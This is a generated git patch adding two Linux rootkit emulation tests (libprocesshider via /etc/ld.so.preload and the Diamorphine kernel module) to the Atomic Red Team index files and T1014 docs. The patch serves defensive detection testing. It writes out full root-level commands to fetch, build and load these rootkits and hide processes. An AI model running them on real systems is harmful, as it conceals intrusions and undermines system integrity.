From 85ad8c995d7ccaadbbb8077eed893e404c8f244c Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Tue, 2 Aug 2022 21:07:36 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/linux-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 2 + .../Indexes/Indexes-Markdown/linux-index.md | 2 + atomics/Indexes/index.yaml | 98 ++++++++++++++ atomics/T1014/T1014.md | 124 ++++++++++++++++++ 6 files changed, 230 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 7531aedb..7aaf6560 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -28,6 +28,8 @@ defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16 defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh +defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh +defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index a0170a84..a2b5299d 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -14,6 +14,8 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh +defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh +defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 82abbff6..1f4ad974 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -43,6 +43,8 @@ - [T1014 Rootkit](../../T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] - Atomic Test #2: Loadable Kernel Module based Rootkit [linux] + - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux] + - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux] - T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 4e1e11eb..578a51fb 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -22,6 +22,8 @@ - [T1014 Rootkit](../../T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] - Atomic Test #2: Loadable Kernel Module based Rootkit [linux] + - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux] + - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux] - T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md) - Atomic Test #1: Sudo usage [macos, linux] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 13a32253..375ad111 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1712,6 +1712,104 @@ defense-evasion: sudo depmod -a name: sh elevation_required: true + - name: dynamic-linker based rootkit (libprocesshider) + auto_generated_guid: 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 + description: 'Uses libprocesshider to simulate rootkit behavior by hiding a + specific process name via ls.so.preload (see also T1574.006). + + ' + supported_platforms: + - linux + input_arguments: + repo: + description: Url of the github repo zip + type: String + default: https://github.com/gianlucaborello/libprocesshider/ + rev: + description: Revision of the github repo zip + type: String + default: 25e0587d6bf2137f8792dc83242b6b0e5a72b415 + library_path: + description: Full path of the library to add to ld.so.preload + type: String + default: "/usr/local/lib/libprocesshider.so" + dependency_executor_name: bash + dependencies: + - description: 'The preload library must exist on disk at specified location + (#{library_path}) + + ' + prereq_command: 'if [ -f #{library_path} ]; then exit 0; else exit 1; fi; + + ' + get_prereq_command: | + mkdir -p /tmp/atomic && cd /tmp/atomic + curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev} + make + cp libprocesshider.so #{library_path} + cp /usr/bin/ping /usr/local/bin/evil_script.py + executor: + command: | + echo #{library_path} | tee -a /etc/ld.so.preload + /usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden" + cleanup_command: | + sed -i "\:^#{library_path}:d" /etc/ld.so.preload + rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic + name: sh + elevation_required: true + - name: Loadable Kernel Module based Rootkit (Diamorphine) + auto_generated_guid: 0b996469-48c6-46e2-8155-a17f8b6c2247 + description: 'Loads Diamorphine kernel module, which hides itself and a processes. + + ' + supported_platforms: + - linux + input_arguments: + repo: + description: Url of the diamorphine github repo + type: String + default: https://github.com/m0nad/Diamorphine/ + rev: + description: Revision of the github repo zip + type: String + default: 898810523aa2033f582a4a5903ffe453334044f9 + rootkit_path: + description: Path To rootkit + type: String + default: "/tmp/atomic/Diamorphine" + rootkit_name: + description: Module name + type: String + default: diamorphine + dependency_executor_name: bash + dependencies: + - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko) + + ' + prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then + exit 0; else exit 1; fi; + + ' + get_prereq_command: | + mkdir -p /tmp/atomic && cd /tmp/atomic + curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev} + make + sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/ + sudo depmod -a + executor: + command: | + sudo modprobe #{rootkit_name} + ping -c 10 localhost >/dev/null & TARGETPID="$!" + ps $TARGETPID + kill -31 $TARGETPID + ps $TARGETPID || echo "process ${TARGETPID} hidden" + cleanup_command: | + kill -63 1 + sudo modprobe -r #{rootkit_name} + sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic + sudo depmod -a + name: sh + elevation_required: true T1109: technique: x_mitre_platforms: diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 75bcea5a..f55e3b09 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -10,6 +10,10 @@ Rootkits or rootkit enabling functionality may reside at the user or kernel leve - [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit) +- [Atomic Test #3 - dynamic-linker based rootkit (libprocesshider)](#atomic-test-3---dynamic-linker-based-rootkit-libprocesshider) + +- [Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine)](#atomic-test-4---loadable-kernel-module-based-rootkit-diamorphine) +
@@ -129,4 +133,124 @@ sudo depmod -a +
+
+ +## Atomic Test #3 - dynamic-linker based rootkit (libprocesshider) +Uses libprocesshider to simulate rootkit behavior by hiding a specific process name via ls.so.preload (see also T1574.006). + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| repo | Url of the github repo zip | String | https://github.com/gianlucaborello/libprocesshider/| +| rev | Revision of the github repo zip | String | 25e0587d6bf2137f8792dc83242b6b0e5a72b415| +| library_path | Full path of the library to add to ld.so.preload | String | /usr/local/lib/libprocesshider.so| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +echo #{library_path} | tee -a /etc/ld.so.preload +/usr/local/bin/evil_script.py localhost -c 10 >/dev/null & pgrep -l evil_script.py || echo "process hidden" +``` + +#### Cleanup Commands: +```sh +sed -i "\:^#{library_path}:d" /etc/ld.so.preload +rm -rf #{library_path} /usr/local/bin/evil_script.py /tmp/atomic +``` + + + +#### Dependencies: Run with `bash`! +##### Description: The preload library must exist on disk at specified location (#{library_path}) +##### Check Prereq Commands: +```bash +if [ -f #{library_path} ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```bash +mkdir -p /tmp/atomic && cd /tmp/atomic +curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd libprocesshider-#{rev} +make +cp libprocesshider.so #{library_path} +cp /usr/bin/ping /usr/local/bin/evil_script.py +``` + + + + +
+
+ +## Atomic Test #4 - Loadable Kernel Module based Rootkit (Diamorphine) +Loads Diamorphine kernel module, which hides itself and a processes. + +**Supported Platforms:** Linux + + +**auto_generated_guid:** 0b996469-48c6-46e2-8155-a17f8b6c2247 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| repo | Url of the diamorphine github repo | String | https://github.com/m0nad/Diamorphine/| +| rev | Revision of the github repo zip | String | 898810523aa2033f582a4a5903ffe453334044f9| +| rootkit_path | Path To rootkit | String | /tmp/atomic/Diamorphine| +| rootkit_name | Module name | String | diamorphine| + + +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) + + +```sh +sudo modprobe #{rootkit_name} +ping -c 10 localhost >/dev/null & TARGETPID="$!" +ps $TARGETPID +kill -31 $TARGETPID +ps $TARGETPID || echo "process ${TARGETPID} hidden" +``` + +#### Cleanup Commands: +```sh +kill -63 1 +sudo modprobe -r #{rootkit_name} +sudo rm -rf /lib/modules/$(uname -r)/#{rootkit_name}.ko /tmp/atomic +sudo depmod -a +``` + + + +#### Dependencies: Run with `bash`! +##### Description: The kernel module must exist on disk at specified location (#{rootkit_path}/#{rootkit_name}.ko) +##### Check Prereq Commands: +```bash +if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; +``` +##### Get Prereq Commands: +```bash +mkdir -p /tmp/atomic && cd /tmp/atomic +curl -sLO #{repo}/archive/#{rev}.zip && unzip #{rev}.zip && cd Diamorphine-#{rev} +make +sudo cp #{rootkit_name}.ko /lib/modules/$(uname -r)/ +sudo depmod -a +``` + + + +